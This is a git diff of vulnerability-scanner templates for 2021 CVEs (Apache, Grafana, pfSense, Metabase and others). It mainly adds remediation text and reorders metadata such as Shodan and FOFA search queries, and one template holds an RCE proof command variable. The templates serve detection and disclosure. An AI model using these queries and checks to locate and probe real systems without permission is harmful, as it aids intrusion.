https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/711 - https://nvd.nist.gov/vuln/detail/CVE-2021-40972 - https://github.com/spotweb/spotweb - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51596 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb http: diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index fc80b21289..9e0b955c9d 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter. + remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/711 - https://nvd.nist.gov/vuln/detail/CVE-2021-40973 - https://github.com/spotweb/spotweb - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51596 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb http: diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index d9c990e2a4..77cf0aed79 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. + remediation: | + Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability. reference: - https://github.com/mkdocs/mkdocs/pull/2604 - https://github.com/nisdn/CVE-2021-40978 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-40978 cwe-id: CWE-22 epss-score: 0.04273 - cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* epss-percentile: 0.91189 + cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mkdocs diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 68be01e7a1..7cacd46105 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -5,26 +5,26 @@ info: author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + remediation: Upgrade to 8.2.3 or higher. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 - https://github.com/grafana/grafana/commit/fb85ed691290d211a5baa44d9a641ab137f0de88 - remediation: Upgrade to 8.2.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 epss-score: 0.96462 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.99384 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Grafana" vendor: grafana product: grafana + shodan-query: title:"Grafana" tags: cve,cve2021,grafana,xss http: diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 786a12e687..8a76137bf6 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -5,6 +5,8 @@ info: author: bananabr severity: medium description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. + remediation: | + Remove or update the default secrets in the Redash setup configuration file. reference: - https://hackerone.com/reports/1380121 - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-41192 cwe-id: CWE-1188 epss-score: 0.00805 - cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* epss-percentile: 0.79527 + cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:698624197 vendor: "redash" product: "redash" + shodan-query: http.favicon.hash:698624197 tags: hackerone,cve,cve2021,redash,auth-bypass http: diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index ca7f8c0349..0c814aa2af 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -6,19 +6,19 @@ info: severity: critical description: | MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. + remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.' reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 - https://github.com/minio/console/pull/1217 - remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.' classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 epss-score: 0.04636 - cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* epss-percentile: 0.91526 + cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: min diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 8ae375608a..33f0ae7f1a 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -5,26 +5,26 @@ info: author: 0x_Akoko severity: high description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. + remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr - https://nvd.nist.gov/vuln/detail/CVE-2021-41277 - https://twitter.com/90security/status/1461923313819832324 - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0 - remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41277 cwe-id: CWE-200,CWE-22 epss-score: 0.95953 - cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* epss-percentile: 0.99232 + cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="Metabase" - shodan-query: http.title:"Metabase" vendor: metabase product: metabase + shodan-query: http.title:"Metabase" + fofa-query: app="Metabase" tags: cve,cve2021,metabase,lfi http: diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index a7ab3e8702..74ee536457 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -6,22 +6,22 @@ info: severity: high description: | diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. + remediation: | + Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. reference: - https://www.shielder.it/advisories/pfsense-remote-command-execution/ - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 - https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html - remediation: | - Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-41282 cwe-id: CWE-74 epss-score: 0.97136 - cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* epss-percentile: 0.99688 + cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* metadata: max-request: 4 vendor: pfsense diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 793f16aba3..447b11884e 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41291 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-41291 cwe-id: CWE-22 epss-score: 0.11826 - cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.94586 + cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ecoa diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 5d748b42e0..53237b9524 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-41293 cwe-id: CWE-22 epss-score: 0.11826 - cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.94586 + cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ecoa diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index a68643e91a..d193076532 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: medium description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305. + remediation: | + Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: - https://www.microsoft.com/en-us/download/details.aspx?id=103643 - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 @@ -16,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-41349 epss-score: 0.96426 - cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* epss-percentile: 0.99374 + cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 12bbb31b48..f375519553 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. + remediation: | + Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability. reference: - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-41381 cwe-id: CWE-22 epss-score: 0.04909 - cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* epss-percentile: 0.91773 + cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: payara diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index c9e818bead..9cd1751387 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00084 - cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* epss-percentile: 0.34562 + cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: http.html:"Flatpress" verified: true + max-request: 4 vendor: flatpress product: flatpress + shodan-query: http.html:"Flatpress" tags: cve,cve2021,flatpress,xss,authenticated,oss,intrusive http: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index b327c80398..8be3f53307 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. + remediation: | + Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823 - https://nvd.nist.gov/vuln/detail/CVE-2021-41460 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-41460 cwe-id: CWE-89 epss-score: 0.01115 - cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* epss-percentile: 0.82751 + cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: product="ECShop" + max-request: 1 vendor: shopex product: ecshop + fofa-query: product="ECShop" tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 825cbd12b8..2da83eb852 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/hjue/JustWriting/issues/106 - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-41467 cwe-id: CWE-79 epss-score: 0.00138 - cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.48606 + cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: justwriting_project diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index 64c2765b76..b4f316a289 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. + remediation: | + Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. reference: - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - https://support.sas.com/kb/68/641.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-41569 cwe-id: CWE-829 epss-score: 0.00978 - cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* epss-percentile: 0.81497 + cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sas diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index fdde12722b..3835904f12 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/MobiusBinary/CVE-2021-41648 - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-41648 cwe-id: CWE-89 epss-score: 0.04318 - cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* epss-percentile: 0.91227 + cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: online-shopping-system-advanced_project diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index f2f70aa26f..bc51435845 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/MobiusBinary/CVE-2021-41649 - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-41649 cwe-id: CWE-89 epss-score: 0.03215 - cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* epss-percentile: 0.89928 + cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: online-shopping-system-advanced_project diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index f5863483f8..dc3744cfb3 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -5,20 +5,20 @@ info: author: gy741 severity: critical description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. + remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - https://www.tp-link.com/us/press/security-advisory/ - http://tp-link.com - remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 epss-score: 0.95457 - cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99108 + cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: tp-link diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index 5f0d078822..03e2cf0f62 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -5,6 +5,8 @@ info: author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + remediation: | + Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 72914709ae..663b8071f4 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + remediation: | + Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 @@ -19,14 +21,14 @@ info: cve-id: CVE-2021-41773 cwe-id: CWE-22 epss-score: 0.97532 - cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* epss-percentile: 0.99986 + cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: Apache 2.4.49 verified: true + max-request: 3 vendor: apache product: http_server + shodan-query: Apache 2.4.49 tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index 3d65c97eae..e5c883f49a 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect. + remediation: | + Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability. reference: - https://github.com/PlaceOS/auth/issues/36 - https://www.exploit-db.com/exploits/50359 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-41826 cwe-id: CWE-601 epss-score: 0.93913 - cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* epss-percentile: 0.988 + cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: place diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 762c9f9495..11c019b1ff 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878 @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-41878 cwe-id: CWE-79 epss-score: 0.00476 - cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* epss-percentile: 0.72656 + cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: hkurl product: i-panel_administration_system tags: cve,cve2021,ipanel,xss,packetstorm diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index bb1e8ebefb..3dd5b5aa58 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -5,6 +5,8 @@ info: author: zsusac severity: medium description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. + remediation: | + Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration. reference: - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/ - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-4191 cwe-id: CWE-287 epss-score: 0.46947 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* epss-percentile: 0.96965 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 95490c3903..560c718c0c 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -5,6 +5,8 @@ info: author: coldfish severity: medium description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/ - https://nvd.nist.gov/vuln/detail/CVE-2021-41951 @@ -14,8 +16,8 @@ info: cve-id: CVE-2021-41951 cwe-id: CWE-79 epss-score: 0.74732 - cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* epss-percentile: 0.97725 + cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: montala diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 3b003e12a5..4a578010b4 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -6,24 +6,24 @@ info: severity: critical description: | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. + remediation: Upgrade to Apache HTTP Server 2.4.51 or later. reference: - https://httpd.apache.org/security/vulnerabilities_24.html - 